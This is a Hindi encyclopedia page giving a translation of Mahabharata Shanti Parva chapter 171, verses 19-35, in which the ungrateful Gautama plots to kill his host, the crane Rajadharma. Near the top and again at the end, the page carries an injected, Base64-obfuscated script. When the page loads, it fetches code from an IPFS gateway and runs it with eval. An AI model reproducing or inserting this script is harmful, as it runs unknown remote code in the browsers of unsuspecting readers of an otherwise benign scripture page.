महाभारत शान्ति पर्व अध्याय 171 श्लोक 19-35

अद्‌भुत भारत की खोज
नेविगेशन पर जाएँ खोज पर जाएँ
गणराज्य इतिहास पर्यटन भूगोल विज्ञान कला साहित्य धर्म संस्कृति शब्दावली विश्वकोश भारतकोश

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

एकसप्‍तत्‍यधिकशततम (171) अध्याय: शान्ति पर्व (आपद्धर्म पर्व)

महाभारत: शान्ति पर्व: एकसप्‍तत्‍यधिकशततम अध्याय: श्लोक 19-35 का हिन्दी अनुवाद

भारत! भोजन के पश्‍चात् ब्राह्मणों के समक्ष बहुत-से सोने, चांदी, मणि, मोति, बहुमूल्‍य हीरे, वैदूर्यमणि, रंकुमृगक के चर्म तथा रत्‍नों के कई ढेर लगाकर महाबली विरूपाक्ष ने उन श्रेष्‍ठ ब्राह्मणों से कहा- ‘द्विजवरो! आपलोग अपनी इच्‍छा और उत्साह के अनुसार इन रत्‍नों को उठा ले जायं और जिनमें आपलोगों ने भोजन किया है, उन पात्रों को भी अपने घर लेते जायं’। उन महात्‍मा राक्षसराज के ऐसा कहने पर उन ब्राह्मणों ने इच्‍छानुसार उन सब रत्‍नों को ले लिया। तत्‍पश्‍चात् उन सुदंर एवं महामूल्‍यवान् रत्‍नोद्वारा पूजित हुए वे सभी उज्‍जवल वस्‍त्रधारी ब्राह्मण बड़े प्रसन्‍न हुए। राजन्! इसके बाद राक्षसराज विरूपाक्ष ने नाना देशों से आये हुए राक्षसों को हिंसा करने से रोककर उन ब्राह्मणों से कहा- ‘विप्रगण! आज एक दिन के लिये आपलोगों को राक्षसों की ओर से कहीं कोई भय नहीं है; अत: आनन्‍द कीजिये और शीघ्र ही अपने अभीष्‍ट स्‍थान को चले जाइये। विलम्‍ब न कीजिये’। यह सुनकर सब ब्राह्मण समुदाय चारों ओर भाग चले । गौतम भी सुवर्ण का भारी भार लेकर बड़ी कठिनाई से ढोता हुआ जल्‍दी–जल्‍दी चलकर बरगद के पास आया। वहां पहुंचते ही थककर बैठ गया। वह भूख से पीड़ित और क्‍लांत हो रहा था। राजन्! तत्‍पश्‍चात् प‍क्षियों में श्रेष्‍ठ मित्रवत्‍सल राजधर्मा गौतमके पास आया और स्‍वागतपूर्वकउसका अभिनन्‍दन किया। उस बुद्धिमान् पक्षी ने अपने पंखों के अग्रभाग का संचालन करके उसे हवा की और उसकी सारी थकावट दूर कर दी; फिर उसका पूजन किया तथा उसके लिये भोजन की व्‍यवसथा की। भोजन करके विश्राम कर लेने पर गौतम इस प्रकार चिंता करने लगा- ‘अहो! मैंने लोभ और मोह से प्रेरित होकर सुंदर सुवर्ण का यह महान् भार ले लिया है। अभी मुझे बहुत दूर जाना है। रास्‍तें में खाने के लिये कुछ भी नहीं है जिससे मेरे प्राणों की रक्षा हो सके। ‘अब मैं कौन–सा उपाय करके अपने प्राणों को धारण सकूंगा?’ इस प्रकार की चिंता में वह मग्‍न हो गया। पुरूष सिंह! तदनन्‍तर मार्ग में भेाजन के लिये कुछ भी न देखकर उस कृतघ्‍न ने मन–ही–मन इस प्रकार विचार किया- ‘यह बगुलों का राजा राजधर्मा मेरे पास ही तो है। यह मांस का एक बहुत बड़ा ढेर है। इसी को मारकर ले लूं और शीघ्रतापूर्वक यहां से चल दूं’।

इस प्रकार श्रीमहाभारत शान्तिपर्व के अन्तर्गत आपद्धर्मपर्व में कृतघ्‍न का उपाख्‍यान विषयक एक सौ इकहतरवां अध्‍याय पूरा हुआ।


« पीछे आगे »

टीका टिप्पणी और संदर्भ

संबंधित लेख

साँचा:सम्पूर्ण महाभारत अभी निर्माणाधीन है।

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>